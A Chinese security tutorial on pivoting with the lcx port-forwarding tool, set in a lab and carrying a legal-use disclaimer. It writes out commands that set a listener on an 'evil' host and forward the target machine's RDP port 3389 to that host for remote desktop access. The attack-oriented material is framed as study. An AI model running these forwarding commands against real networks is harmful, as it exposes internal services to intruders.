跳板攻击之:lcx 端口转发

郑重声明:

本笔记编写目的只用于安全知识提升,并与更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果与作者本人无关。倡导维护网络安全人人有责,共同维护网络文明和谐。

1 lcx 端口转发原理

  1. LCX项目地址:windworst/LCX: My LCX, PortMaper. used in Windows,Linux,Android,Mac (github.com)

lcx 是基于 Socket 套接字实现的端口转发工具,Windows 版本名称为 LCX、Linux 版本为 portmap。

一个基本的 Socket 隧道必须包含两端:

  1. 服务端:监听一个端口,等待客户端连接
  2. 客户端:通过传入服务端的 IP 地址和端口,与服务端建立连接。
lcx.exe -h

[Usage of Packet Transmit:]

 lcx.exe -<listen|tran|slave> <option> [-log logfile]

[option:]

 -listen <ConnectPort> <TransmitPort>

 -tran   <ConnectPort> <TransmitHost> <TransmitPort> # 经测试无法过 nat 有点鸡肋。

 -slave <ConnectHost> <ConnectPort> <TransmitHost> <TransmitPort>

2 实验环境

3 配置服务端

  • 在 evil 主机上,将本机 4444 端口上监听的所有数据转发到本地的 13389 端口上
lcx.exe -listen 4444 13389

4 配置客户端

  • 首先准备好一个具有公网 ip 的服务器,假定域名或者公网 ip 是 192.168.0.21
  • 在目标机器上将 3389 端口的所有数据转发到恶意主机的 4444 端口上。

  1. 配置 LCX 端口转发

    .\lcx.exe -slave 192.168.0.110 4444 127.0.0.1 3389

  2. 客户端与服务端建立通信连接

  3. 与远程主机建立远程桌面连接

    • 客户端:

    • 服务端:

  4. 抓包查看流量特征

最新文章

  1. CentOS 安装tomcat 7
  2. Java程序员必须知道的10个调试技巧
  3. ubuntu15.10_x64 安装 nginx
  4. 让Chrome支持Ajax/$http方式读取本地文件
  5. 使用ASP.NET 5开发AngularJS应用
  6. Netsharp快速入门(之18) 平台常用功能(工作区相关)
  7. CornerStone 破解 最简单的破解方法
  8. python 调用hive查询实现类似存储过程
  9. Activity 和 Intent
  10. UVALive 6472 Powers of Pascal
  11. Java-DES算法加密解密工具类
  12. Linux shell 操作 postgresql,并设置crontab任务
  13. Python爬虫从入门到放弃(十)之 关于深度优先和广度优先
  14. css清除浮动主要方法
  15. Action调用Service
  16. 堆,set,优先队列
  17. Dockerfile的常见命令
  18. Populate screen data automatically
  19. [No0000198]swagger api一键导入postman
  20. MongoDB shell 介绍

热门文章

  1. Fastjson漏洞+复现
  2. linux系统部署微服务项目
  3. vue 强制刷新数据 this.$forceUpdate()
  4. 基于ZR.VUE 前端的改造,页面刷新报错
  5. 使用Jiralert实现AlertManager告警对接Jira
  6. Isaac Sim 机器人仿真器介绍、安装与 Docker [1]
  7. [Unity]Unity更改黑色主题(个人版)
  8. [cocos2d-x]判断两个矩形是否有交叉区域
  9. angular11报错Can&#39;t bind to &#39;ngForOf&#39; since it isn&#39;t a known property of &#39;tr&#39;. 三种排查办法以及解决方案
  10. Java 进阶P-4.4+P-4.5